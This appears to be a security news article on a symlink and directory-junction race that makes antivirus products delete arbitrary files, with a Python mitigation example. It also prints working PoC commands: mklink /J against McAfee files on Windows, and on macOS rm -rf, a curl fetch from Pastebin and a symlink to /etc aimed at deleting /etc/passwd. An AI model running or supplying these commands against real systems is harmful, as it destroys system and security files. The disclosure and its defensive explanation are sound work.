The researchers discovered a simple flaw present in nearly 28 antivirus programs that lets malware authors abuse the operating system to turn the antivirus programs themselves into self-destructive tools.
The flaws stem from improper handling of directory junctions (Windows) and symbolic links (macOS and Linux), which the researchers used to carry out the attack.
A directory junction is specific to Windows and can only link two directories; it cannot link files, and both directories must be on the local file system.
No administrator rights are required to create a directory junction on Windows.
A symbolic link, also called a symlink, is commonly used on Linux and macOS; it is a file type that points to another file.
In both cases, the flaw abuses the antivirus software's privileged file operations to disable the antivirus itself or to render the operating system unusable.
Antivirus software runs with high privileges, the highest level of authorization on the machine, so that it can scan every file and folder for unknown and malicious files, quarantine them and move them to an isolated location.
Because of this design, antivirus software is exposed to a range of vulnerabilities and race conditions, which ultimately let attackers obtain high-level privileges on vulnerable systems.
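The mitigation for this bug class is for the privileged process to never follow a link while acting on a path it has already checked. The added example below (not code from the researchers or from any antivirus vendor; it assumes a POSIX system and the hypothetical helper names safe_unlink and demo) walks the path one component at a time, opening each directory with O_NOFOLLOW and deleting relative to that descriptor, so swapping a scan directory for a symlink between the check and the delete is refused instead of redirected:

```python
import os
import stat
import tempfile


def safe_unlink(path: str) -> bool:
    """Delete `path` without following a symlink in any component.
    Each directory is opened with O_NOFOLLOW and the next step is taken
    relative to that descriptor, so a swap after the check cannot redirect
    the delete. Returns False when the delete is refused."""
    parts = [p for p in os.path.abspath(path).split(os.sep) if p]
    if not parts:
        return False
    dir_fd = os.open(os.sep, os.O_RDONLY | os.O_DIRECTORY)
    try:
        for comp in parts[:-1]:
            try:  # ELOOP if comp is a symlink, ENOTDIR if it is not a directory
                nxt = os.open(comp, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW, dir_fd=dir_fd)
            except OSError:
                return False
            os.close(dir_fd)
            dir_fd = nxt
        st = os.stat(parts[-1], dir_fd=dir_fd, follow_symlinks=False)
        if not stat.S_ISREG(st.st_mode):  # refuse symlinks, directories, devices
            return False
        os.unlink(parts[-1], dir_fd=dir_fd)
        return True
    except OSError:
        return False
    finally:
        os.close(dir_fd)


def demo() -> dict:
    """Constructed scenario: the scan directory is swapped for a symlink to a
    directory holding a same-named file, as in the swap described above."""
    base = os.path.realpath(tempfile.mkdtemp())
    scan, protected = os.path.join(base, "scan"), os.path.join(base, "protected")
    os.mkdir(scan)
    os.mkdir(protected)
    victim = os.path.join(protected, "important.txt")   # must survive
    flagged = os.path.join(scan, "important.txt")       # the "detected" file
    for p in (victim, flagged):
        with open(p, "w") as f:
            f.write("sample\n")
    removed_real = safe_unlink(flagged)       # real directory, real file: deleted
    os.rmdir(scan)
    os.symlink(protected, scan)               # the swap
    removed_via_link = safe_unlink(flagged)   # refused, victim untouched
    return {"removed_real": removed_real, "removed_via_link": removed_via_link,
            "victim_survived": os.path.exists(victim)}
```

A naive os.remove() on the same path after the swap would follow the link and delete the file in the protected directory, which is exactly what the PoCs on this page rely on.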
Exploitation and impact
The vulnerability is easy to exploit for an experienced malware author, but it is highly timing dependent: the attacker must know exactly when to perform the directory junction or symlink swap.
A local attacker trying to escalate privileges would need to learn the right moment to perform that swap.
According to the report: “For some of the antivirus programs we used, timing was not important at all, and it was enough to repeat the exploit cycle several times to manipulate the antivirus software into self-destructing. One second too early or one second too late and the exploit does not work.”
Windows exploitation (PoC video)
The researchers tested their proof-of-concept exploit against McAfee Endpoint Security for Windows and managed to delete the EpSecApiLib.dll file.
“During our tests we were able to delete any file that was not currently in use, including the ability to disrupt the operation of the antivirus itself,” the researchers said.
rd /s /q C:\Users\User\Desktop\exploit
echo X5O!P%@AP[4\PZX54(P^^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* > C:\Users\User\Desktop\exploit\EpSecApiLib.dll
rd /s /q C:\Users\User\Desktop\exploit
mklink /J C:\Users\User\Desktop\exploit "C:\Program Files (x86)\McAfee\Endpoint Security\Endpoint Security Platform"
macOS and Linux exploitation (PoC video)
The researchers ran their PoC exploit against Norton Internet Security for macOS and downloaded the EICAR test string from Pastebin to bypass real-time protection, since the test string could not be downloaded from the official Norton website.
When the test string is downloaded from Pastebin, the antivirus program immediately detects it as malicious and tries to clean it up.
The researchers stated that they were able to determine an estimated time delay of 6 to 8 seconds, which is enough to trigger a race condition that lets a symbolic link attack delete any file, because the software runs as root.
Working PoC code for macOS
rm -rf /Users/username/exploit; mkdir /Users/username/exploit
curl -k https://pastebin.com/raw/jZJ6Ekzt > /Users/username/exploit/passwd
rm -rf /Users/username/exploit; ln -s /etc /Users/username/exploit
This proof of concept also works against some Linux antivirus programs, where the researchers were able to delete important files belonging to the antivirus program itself.
All affected antivirus vendors were contacted individually, and almost all of the antivirus products listed on this page have now been fixed.
Users are advised to apply the latest patch for the respective antivirus software installed on their computers.